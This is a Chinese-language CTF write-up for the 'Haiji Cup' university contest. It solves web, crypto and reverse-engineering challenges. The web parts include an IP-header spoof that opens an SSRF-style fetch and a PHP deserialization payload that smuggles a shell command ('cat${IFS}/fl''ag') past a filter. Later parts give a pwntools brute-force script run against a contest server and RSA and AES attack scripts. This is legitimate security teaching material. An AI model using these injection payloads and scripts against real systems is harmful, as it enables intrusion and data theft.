FIRST
“骇极杯”全国大学生网络安全邀请赛一手WriteUp
——特别感谢本文作者:flam4nplus——
本文作者多次参与“安恒杯”取得亮眼的成绩
在本次”骇极杯”中他所在的队伍取得了
rank 7、re和crypto均AK的好成绩
~Congratulations!
首先,burpsuite抓一波流量
将GET改为POST,并且post admin=1
访问robots.txt
发现有source.php和flag.php
访问flag.php无果,所以只能去看source.php
这里看到需要伪造ip 在头中伪造ip只有几种情况:xff xci clientip remoteaddr
这里添加X-Client-IP:127.0.0.1
继续post url
这里就能看到加载了图片
卡在这里好久,忽然想到因为是127.0.0.1会不会是file协议 进行尝试
发现还是会加载,在上面图片中也发现,不是jpg而是html 所以这里curl一下
顺便拿到了题目源码
<?php
error_reporting(0);
include "flag.php";
echo "you need to login as admin!";
echo "<!-- post param 'admin' -->";
if(isset($_POST['admin']))
{
if($_POST['admin']==1)
{
if($_SERVER['HTTP_X_CLIENT_IP'])
{
if(isset($_POST['url']) && parse_url($_POST['url'])['host']=='www.ichunqiu.com')
{
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $_POST['url']);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
$content = curl_exec($curl);
curl_close($curl);
$filename='download/'.rand().';img1.jpg';
file_put_contents($filename,$content);
echo $_POST['url'];
$img="<img src=\"".$filename."\"/>";
echo $img;
}
else
{
echo "you need post url: http://www.ichunqiu.com";
}
}
else
{
echo "only 127.0.0.1 can get the flag!!";
}
}
}
else
{
$_POST['admin']=0;
}
顺带就拿到了flag
这道题目首先用扫描软件扫到了泄漏的源码
<?php
error_reporting(0);
class come{
private $method;
private $args;
function __construct($method, $args) {
$this->method = $method;
$this->args = $args;
}
function __wakeup(){
foreach($this->args as $k => $v) {
$this->args[$k] = $this->waf(trim($v));
}
}
function waf($str){
$str=preg_replace("/[<>*;|?\n ]/","",$str);
$str=str_replace('flag','',$str);
return $str;
}
function echo($host){
system("echo $host");
}
function __destruct(){
if (in_array($this->method, array("echo"))) {
call_user_func_array(array($this, $this->method), $this->args);
}
}
}
$first='hi';
$var='var';
$bbb='bbb';
$ccc='ccc';
$i=1;
foreach($_GET as $key => $value) {
if($i===1)
{
$i++;
$$key = $value;
}
else{break;}
}
if($first==="doller")
{
@parse_str($_GET['a']);
if($var==="give")
{
if($bbb==="me")
{
if($ccc==="flag")
{
echo "<br>welcome!<br>";
$come=@$_POST['come'];
unserialize($come);
}
}
else
{echo "<br>think about it<br>";}
}
else
{
echo "NO";
}
}
else
{
echo "Can you hack me?<br>";
}
?>
然后是反序列化漏洞
直接firefox f12 hackbar
http://8c2a8dee973d47ffbf0027140ec9e6dfc88e980052e84454.game.ichunqiu.com/?first=doller&a=var=give%26bbb=me%26ccc=flag
come=O%3A4%3A%22come%22%3A2%3A%7Bs%3A12%3A%22%00come%00method%22%3Bs%3A4%3A%22echo%22%3Bs%3A10%3A%22%00come%00args%22%3Ba%3A1%3A%7Bs%3A4%3A%22host%22%3Bs%3A20%3A%22123%26cat%24%7BIFS%7D%2Ffl%22%22ag%22%3B%7D%7D123
直接拿到flag
很简单的base32,直接在线解密
MZWGCZ33GM2TEMRSMQZTALJUGM4WKLJUMFTGELJZGFTDILLBMJSWEYZXGNTGKMBVMN6Q
此类型题目,正好在之前出过一道题,不过之前的WP写的太简单了,pyc的字节码忘的都差不多了。这次赶紧搜罗一波,把相关的东西保存一下。 参考链接如下: https://github.com/python/cpython/blob/master/Include/opcode.h https://bbs.pediy.com/thread-246683.htm https://das.scusec.org/2017/03/24/pythonopcode/ http://unpyc.sourceforge.net/Opcodes.html
整理之后的opcode如下:
03f3 0d0a
bebc ce5b
63
00 0000 00
00 000000
0f 0000 00
40 0000 00
73
b200 0000 178长度
710600 JUMP_ABSOLUTE
642333 LOAD_CONST
710900 JUMP_ABSOLUTE 12个
640000 LOAD_CONST 0
640100 LOAD_CONST 1
640200 LOAD_CONST 2
640300 LOAD_CONST 3
640400 LOAD_CONST 4
640500 LOAD_CONST 5
640200 LOAD_CONST 2
640600 LOAD_CONST 6
640600 LOAD_CONST 6
640700 LOAD_CONST 7
640800 LOAD_CONST 8
640900 LOAD_CONST 9
640a00 LOAD_CONST a
640b00 LOAD_CONST b
640c00 LOAD_CONST c
670f00 BUILD_LIST f cmp[0xf]
5a0000 STORE_NAME 0
m[0xf]=[0,10,7,1,29,14.7,22,22,31,57,30,9,52,27]
650100 LOAD_NAME 1 raw_input
830000 CALL_FUNCTION 0
5a0200 STORE_NAME 2 flag
640000 LOAD_CONST 0 0
5a0300 STORE_NAME 3 m=0
{
785b00 SETUP_LOOP while
650200 LOAD_NAME 2 flag
44 GET_ITER
5d5300 FOR_ITER
5a0400 STORE_NAME 4 i=..
650500 LOAD_NAME 5 ord
650400 LOAD_NAME 4
830100 CALL_FUNCTION ord(i)
0f UNARY_INVERT ~
640d00 LOAD_CONST d 102
40 BINARY_AND &
650500 LOAD_NAME 5
650400 LOAD_NAME 4
830100 CALL_FUNCTION 1 ord(i)
641200 LOAD_CONST 0x12 -103
40 BINARY_AND &
42 BINARY_OR |
5a0400 STORE_NAME 4 i=..
650400 LOAD_NAME 4
650000 LOAD_NAME 0 cmp
650300 LOAD_NAME 3 m
19 BINARY_SUBSCR []
6b0200 COMPARE_OP 2 ==
7290 00 POP_JUMP_IF_FALSE
650300 LOAD_NAME 3 m
0b UNARY_NEGATIVE -m
640e00 LOAD_CONST 0xe -1
17 BINARY_ADD +
0b UNARY_NEGATIVE -
5a0300 STORE_NAME 3 m=...
714900 JUMP_ABSOLUTE
714900 JUMP_ABSOLUTE
640f00 LOAD_CONST f wrong
47 PRINT_ITEM
48 PRINT_NEWLINE
650600 LOAD_NAME 6 exit
830000 CALL_FUNCTION 0
01 POP_TOP
714900 JUMP_ABSOLUTE
57 POP_BLOCK
641000 LOAD_CONST right
47 PRINT_ITEM
48 PRINT_NEWLINE
641100
53 return
28 (STORE_SLICE
130000 00
69
0000 0000
69
0a 000000
69
0700 0000
69
0100 00 00
69
1d00 0000
69
0e00 00 00
69
1600 0000
69
1f 0000 00
69
39000000
69
1e 0000 00
69
0900 0000
69
34 000000
69
1b00 0000
69
66 0000 00
69
ffff ffff
74
0500 00 00
7772 6f6e67 wrong
74
05 0000 00
7269 67 6874 right
4e69 99ff ffff
28(
07 0000 00
74
0300 0000
636d 70 cmp
74
0900 0000
7261 775f696e 7075 74 raw_input
74
0400 0000
666c 6167 flag
74
010000 00
6d m
74
01 0000 00
69 i
74
03 0000 00
6f7264 ord
74
04 0000 00
65 7869 74 exit
)
28
0000 0000
28
00 0000 00
28
0000 0000
73
0a 0000 00
65 6173 795f 7079 2e70 79 easy_py.pyc
74
0800 0000
3c6d 6f64 756c 653e <module>
0100 0000
73
14 0000 00
33 01 09 01 06 010d 011f 0110 010c 0106 0205 010b 02
在做的过程中,遇到了一个坑,网上的opcode不全导致
6b0200 COMPARE_OP 2 ==
7290 00 POP_JUMP_IF_FALSE
一直不知道是什么,纠结了好久。 解密脚本如下:
cmp=[0,10,7,1,29,14,7,22,22,31,57,30,9,52,27]
flag=[]
j=0
for c in range(15):
for i in range(255):
if cmp[j] == ((~i)&102)|(i&(-103)):
j=j+1
flag.append(chr(i))
break
print "".join(flag)
拿到源码之后,发现unpad功能没有check,可以通过修改unpad来从后向前逐字节爆破,得到最后的flag。
脚本如下
from pwn import *
import base64, time, random, string
from Crypto.Cipher import AES
from Crypto.Hash import SHA256, MD5
#context.log_level = 'debug'
def choice1():
p.sendline('1')
p.recvuntil('Here is the encrypted flag: 0x', drop = True)
enflag = p.recvuntil('\nWelcome to AES(WXH) encrypt system.', drop = True)
#print enflag
p.recvuntil('Your choice:', drop = True)
return enflag
def choice2(pad):
p.sendline('2')
p.recvuntil('Pad me something:', drop = True)
p.sendline(pad)
p.recvuntil('Your choice:', drop = True)
def bypassproof():
p.recvuntil('sha256(XXXX+')
lastdata = p.recvuntil(')', drop=True)
print lastdata
p.recvuntil(' == ')
digest = p.recvuntil('\nGive me XXXX:', drop=True)
print digest
def proof(s):
return SHA256.new(s + lastdata).hexdigest() == digest
data = pwnlib.util.iters.mbruteforce(proof, string.ascii_letters + string.digits, 4, method='fixed')
print data
p.sendline(data)
#p.recvuntil('Done!\n')
p = remote('106.75.13.64', 54321)
bypassproof()
p.recvuntil('Your choice:', drop = True)
flag_enc = choice1()
#print encflag
flag = ""
for i in range(33):
a = ''.join(['a' for _ in range(223)])
a = a[:-1] + chr(224 + i)
for c in string.printable:
#print c+flag
choice2(a)
choice2(c+flag)
if choice1() == flag_enc:
flag = c + flag
print "success:"+flag
break
首先要先proof 脚本如下
def brute_force(pad, shavalue):
dict = string.letters + string.digits
key = ""
for i1 in dict:
tmp = key
key1 = tmp + i1
for i2 in dict:
tmp = key1
key2 = tmp + i2
for i3 in dict:
tmp = key2
key3 = tmp + i3
for i4 in dict:
tmp = key3
key4 = tmp + i4
final_key = key4
if sha512(pad+key4).hexdigest()==shavalue:
print key4
return key4
key_1 = brute_force('XkJ6v0Svif9H5wWd','6eb77ec24eee0fd5e59290c44acf22e377a3b08e33e0efa2bfd9971dbacf3e8a3bc32eed2fc710ddb26863f01dd82c63224fdc9851d9f9f46a9e6402c68206f5')
print key_1
随后要解决这里的问题
发现根本不需要求解他的d和n
直接d=1,n=c-m就好
直接进入下一关
这里需要做一个数学运算 先算cc = pow(2, e, n),然后算ccc = c*cc%n,然后把ccc发过去让服务器解密,拿到明文后除以2
得到的就是MM
post后直接进行aes解密,拿到flag
整个交互过程如下
sha512(XkJ6v0Svif9H5wWd+XXXX) == 6eb77ec24eee0fd5e59290c44acf22e377a3b08e33e0efa2bfd9971dbacf3e8a3bc32eed2fc710ddb26863f01dd82c63224fdc9851d9f9f46a9e6402c68206f5
Tell me XXXX:
ZTmx
OK, you proof.
Give you a message:0x6f57434e74344a6a4831485177694169
and its ciphertext:0xaef0ac66619ad00415bdf53f3232fffb1e19be5ae92b187f98544187f4021d9192b731f3bdedcf024310e918b6dcf052c6c13bca7587650806bcabcba0943ada57abfe8ec6aed1749ebf35d6c1716fd40c5fed105f1604caed170421b2e12efcb174b38bf2427331e2a22bdd4731c004c4d714a3a593b2cd0fd0031968526a4420ff2adfc0b752ddf9c2381e8cfd98f0471e820ee5ee8b83955730bc1087b12151ce0c65b4a90b84555c12db8053429ee6c40e7977b087829bec0e7dc42632d9c16a162500893ac635e3b6c4e1d3e34f069cbdc8183c19a28e400751ae1c9168d0689c0162ce59852170394eb881ab99130a4837422e5081143a2b62a3bc76d8
Please give me the private key to decrypt cipher
n:
22084145559267142542278247205711206806769035096867203562084376236135074979071593494695165415304475011906014512427242327757399235206725659075262541485105057336477881466546208394134375073948200202231086452529564372313656850419369453050936175671378881331075871605986332054320133956210417108252203550155296981956383715305509205993100035845876676100308496728282263311014876821564144113735314621093460404122348973685951350134860330087006324081818356485787747916004167088733576488568724106608053548411305492271813170870510029120401564662767509523812680234467117029176109380429489145638460342248988331319677739729495421826415
d:
1
Oh, how you know the private key!
n=0xac53a7e7f4a8ddb0d52b6df045527551d541a40365116ae66e9d8709442ffcfd786a8df7d203e117a709553d510edece5ae72c8e6f9a9552b4be987e6f2021f2a339930cdb221a8d484ea09df63c2a55f582b3c9ade2912c9650786e9f5c82973e2baea122cb895d06fa174a106d4660740f0c204666dc69168e330b2c41a78633bf24d48d023a6c0bdfa2f3761c4f38d081b5bf8c9ffd11abbe4d5be6e63f064125b3ead319c09242f5366124a0bfc8f73ba11a067a7904fec9c5497b3f376382427e3e60e95ae747cce634d721009cd13350b1cf2383c6880c05ff8ec7824339ea438ea800b5d15ec05fd0df7e53c569e1951560a75eb289f3afdf19beded1
e=0xcf90945cb5ed1485
c=0x9a9c94ec0094c5e3c1e1b6c2b534b637726cba2e8b0da0a2ba3f12cb98a225206755f13a7ae3e459489e253a6b4719645d741a48d3b47184a2bc8cc6be73b4040443821dc7796754cf5f40c3d9845f15f23486d50d06fdbcde6c017599703ac9ec6015ae61b67379f48272f4f84491506bc3e56eaf124c9b14584330657a26b4cc009c489441cafc3ed5555ff2f5806a5b56eb0d312dfea2ad985e37b5a3917f7930b492331bc1e12f71949ae7d76c53a44c5d9f7d25e8856aafd69f3b6bcfb44e5cf2fa9c09aa35bf4b6566c89f174d0c68abd8970aa41e1fe441c4b38c705979e33d5c9a2abf15560477c31b6346fcfc723289b9751f893fb7a8dac47de3f0
Now, you have a chance to decrypt something(but no c):
10861852131164322077412797986625616181717063053353581369663738748831496772954289381470035381197611133580693273961257855424019526480196780126545278666064266535981465755567420264745935227134754534350002537986969850551526328493939419096511440892423045037104987011041181269866090307965509267257918136812218547637066029308872688916113197541758600923169257485066711422003515732668822443487279464330075761022284709750952016470762309134261713817800958762289127439071427678699871872454105477099012449462911427691966935866152040055058801656487819090362844926572779942769475645537130146301058513228439997764047914117721832371520
message:0xce6adae4ac9ec86c8ee264a28ae2a46e
Give me right message:
137187895140717694653920589162394767927
Master in math!
Here is your flag:0x4af4a66ee3ff9bb620e20db7e0f3489bbf4bb358ad8d39a4a446ff4338570a241ec06f2d3703c7cfc1a1c6c0fce789e0
exp如下
#!/usr/bin/python
import random
import string
from hashlib import sha512
from Crypto.Util.number import *
from Crypto.Cipher import AES
'''
def brute_force(pad, shavalue):
dict = string.letters + string.digits
key = ""
for i1 in dict:
tmp = key
key1 = tmp + i1
for i2 in dict:
tmp = key1
key2 = tmp + i2
for i3 in dict:
tmp = key2
key3 = tmp + i3
for i4 in dict:
tmp = key3
key4 = tmp + i4
final_key = key4
if sha512(pad+key4).hexdigest()==shavalue:
print key4
return key4
key_1 = brute_force('XkJ6v0Svif9H5wWd','6eb77ec24eee0fd5e59290c44acf22e377a3b08e33e0efa2bfd9971dbacf3e8a3bc32eed2fc710ddb26863f01dd82c63224fdc9851d9f9f46a9e6402c68206f5')
print key_1
m = 0x6f57434e74344a6a4831485177694169
c = 0xaef0ac66619ad00415bdf53f3232fffb1e19be5ae92b187f98544187f4021d9192b731f3bdedcf024310e918b6dcf052c6c13bca7587650806bcabcba0943ada57abfe8ec6aed1749ebf35d6c1716fd40c5fed105f1604caed170421b2e12efcb174b38bf2427331e2a22bdd4731c004c4d714a3a593b2cd0fd0031968526a4420ff2adfc0b752ddf9c2381e8cfd98f0471e820ee5ee8b83955730bc1087b12151ce0c65b4a90b84555c12db8053429ee6c40e7977b087829bec0e7dc42632d9c16a162500893ac635e3b6c4e1d3e34f069cbdc8183c19a28e400751ae1c9168d0689c0162ce59852170394eb881ab99130a4837422e5081143a2b62a3bc76d8
print c-m
n=0xac53a7e7f4a8ddb0d52b6df045527551d541a40365116ae66e9d8709442ffcfd786a8df7d203e117a709553d510edece5ae72c8e6f9a9552b4be987e6f2021f2a339930cdb221a8d484ea09df63c2a55f582b3c9ade2912c9650786e9f5c82973e2baea122cb895d06fa174a106d4660740f0c204666dc69168e330b2c41a78633bf24d48d023a6c0bdfa2f3761c4f38d081b5bf8c9ffd11abbe4d5be6e63f064125b3ead319c09242f5366124a0bfc8f73ba11a067a7904fec9c5497b3f376382427e3e60e95ae747cce634d721009cd13350b1cf2383c6880c05ff8ec7824339ea438ea800b5d15ec05fd0df7e53c569e1951560a75eb289f3afdf19beded1
e=0xcf90945cb5ed1485
c=0x9a9c94ec0094c5e3c1e1b6c2b534b637726cba2e8b0da0a2ba3f12cb98a225206755f13a7ae3e459489e253a6b4719645d741a48d3b47184a2bc8cc6be73b4040443821dc7796754cf5f40c3d9845f15f23486d50d06fdbcde6c017599703ac9ec6015ae61b67379f48272f4f84491506bc3e56eaf124c9b14584330657a26b4cc009c489441cafc3ed5555ff2f5806a5b56eb0d312dfea2ad985e37b5a3917f7930b492331bc1e12f71949ae7d76c53a44c5d9f7d25e8856aafd69f3b6bcfb44e5cf2fa9c09aa35bf4b6566c89f174d0c68abd8970aa41e1fe441c4b38c705979e33d5c9a2abf15560477c31b6346fcfc723289b9751f893fb7a8dac47de3f0
cc = pow(2,e,n)
ccc = c*cc%n
print ccc
m = 0xce6adae4ac9ec86c8ee264a28ae2a46e
print m/2
'''
enc_flag = '4af4a66ee3ff9bb620e20db7e0f3489bbf4bb358ad8d39a4a446ff4338570a241ec06f2d3703c7cfc1a1c6c0fce789e0'
enc_flag = enc_flag.decode('hex')
msg1 = '6f57434e74344a6a4831485177694169'.decode('hex')
msg2 = '67356d72564f64364771325145715237'.decode('hex')
cipher = AES.new(msg2, AES.MODE_CBC, msg1)
dec = cipher.decrypt(enc_flag)
print dec
签到题吧 对C++了解一点就不会感到那么陌生。
fake=[0x99, 0xb0, 0x87, 0x9e, 0x70, 0xe8, 0x41, 0x44, 0x05, 0x04, 0x8b, 0x9a, 0x74, 0xbc, 0x55, 0x58, 0xb5, 0x61, 0x8e, 0x36, 0xac, 0x09, 0x59, 0xe5,
0x61, 0xdd, 0x3e, 0x3f, 0xb9, 0x15, 0xed, 0xd5]
a = 0x99
b = 0xb0
c = 0x87
d = 0x9e
flag=[]
src=[0 for i in range(32)]
xor1=[0 for i in range(32)]
xor2=[0 for i in range(32)]
xor3=[0 for i in range(32)]
xor4=[0 for i in range(32)]
src[0]=a
src[1]=b
src[2]=c
src[3]=d
xor1[0]=a
xor1[1]=b^a
xor1[2]=a^b^c
xor1[3]=a^b^c^d
xor2[0]=a
xor2[1]=b
xor2[2]=a^c
xor2[3]=d^b
xor3[0]=a
xor3[1]=a^b
xor3[2]=c^b
xor3[3]=d^c
xor4[0]=a
xor4[1]=b
xor4[2]=c
xor4[3]=d
for i in range(4,32):
for j in range(255):
src[i]=j
xor1[i]=(xor1[i-1]^src[i])&0xff
xor2[i]=(xor2[i-1]^xor1[i])&0xff
xor3[i]=(xor3[i-1]^xor2[i])&0xff
xor4[i]=(xor4[i-1]^xor3[i])&0xff
if xor4[i]==fake[i]:
break
for i in range(32):
for j in range(256):
tmp = j*4
result = (((j>>6)|tmp)^i)&0xff
if result == src[i]:
flag.append(chr(j))
break
print "".join(flag)#flag{W0w_y0u_m4st3r_C_p1us_p1us}
flag{W0w_y0u_m4st3r_C_p1us_p1us}
最后的时候才放出来,非常简单的vm题 bytecode如下:
op d1 d2
[0x0F, scanf(%s) s
0x10, 0x14, 0x20, r0=0x20
0x10, 0x16, 0x00, r2=0
0x09, 0x24, point=0x24 jmp code[0x24]
label code[0x9]:
0x02, 0x15, 0x16, r1=s[r2] r2=0 r1=s[0]
0xE9, ++i
0x12, 0x16, v2 = 2 r2++ r2=1
0xE8, ++i
0x02, 0x17, 0x16, r3=s[r2] r3=s[1]
0x13, 0x16, v3 = 2 r2-- r2=0
0x90, ++i
0x06, 0x15, 0x17, r1=r1^r3 r1=s[0]^s[1]
0x45, ++i
0x06, 0x15, 0x16, r1=r1^r2 r1=s[0]^s[1]^r2
0x76, ++i
0x01, 0x15, 0x16, s[r1]=r2 s[r1]=0
0x12, 0x16, v2=2 r2++
0xFF, ++i
label code[0x24]:
0x0A, 0x14, 0x16, v9 = r0 != r2
0x0C, 0x09, if(v9) true point = d1
0x0E sub_4006d6()!=0
解密脚本:
c = [0x0A, 0x0C, 0x04, 0x1F, 0x48, 0x5A, 0x5F, 0x03, 0x62, 0x67, 0x0E, 0x61, 0x1E, 0x19, 0x08, 0x36, 0x47, 0x52, 0x13, 0x57, 0x7C, 0x39, 0x54, 0x4B, 0x05, 0x05, 0x45, 0x77, 0x15, 0x26, 0x0E, 0x62]
# flag=[]
def encode():
flag='a'*0x20
for i in range(32):
c[i]=flag[i]^flag[i+1]^i
def decode():
flag=["}"]
a=[]
tmp = 125
for i in range(30,-1,-1):
tmp = c[i]^tmp^i
flag.append(chr(tmp))
print "".join(flag[::-1])
decode()
flag{7h15_15_MY_f1rs7_s1mpl3_Vm}
前面一部分a-z 6位md5爆破出luck string ozulmt
然后会进入自解码部分,接下来才是真正的验证flag的部分,首先是验证flag格式,并且格式化后之后提取出来,最后同固定数据进行比较即可!
爆破脚本如下:
import hashlib
import string
dic = string.ascii_lowercase
may_fla = []
for i in dic:
for j in dic:
for m in dic:
for n in dic:
for p in dic:
for q in dic:
flag=i+j+m+n+p+q
# print flag
hl = hashlib.md5()
hl.update(flag.encode(encoding='utf-8'))
flag_md5 = hl.hexdigest()
count=0
index_sum=0
for c in range(32):
if flag_md5[c] == '0':
count = count+1
index_sum = index_sum+c
if (10*count+index_sum) == 403:
may_fla.append(flag)
print may_fla
解密脚本如下:
# flag{aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee}
# flag="flag{"
# flag[13]="-"
# flag[18]="-"
# flag[28]="-"
# flag[23]="-"
# flag[41]="}"
c=[0x61, 0x31, 0x39, 0x37, 0x62, 0x38, 0x34, 0x37, 0x37, 0x30, 0x39, 0x32, 0x35, 0x33, 0x61, 0x34, 0x37, 0x63, 0x34, 0x31, 0x62, 0x63, 0x37, 0x64, 0x36, 0x64, 0x35, 0x32, 0x65, 0x36, 0x39, 0x64]
flag = []
for i in c:
flag.append(chr(i))
print "".join(flag)# flag{a197b847-7092-53a4-7c41-bc7d6d52e69d}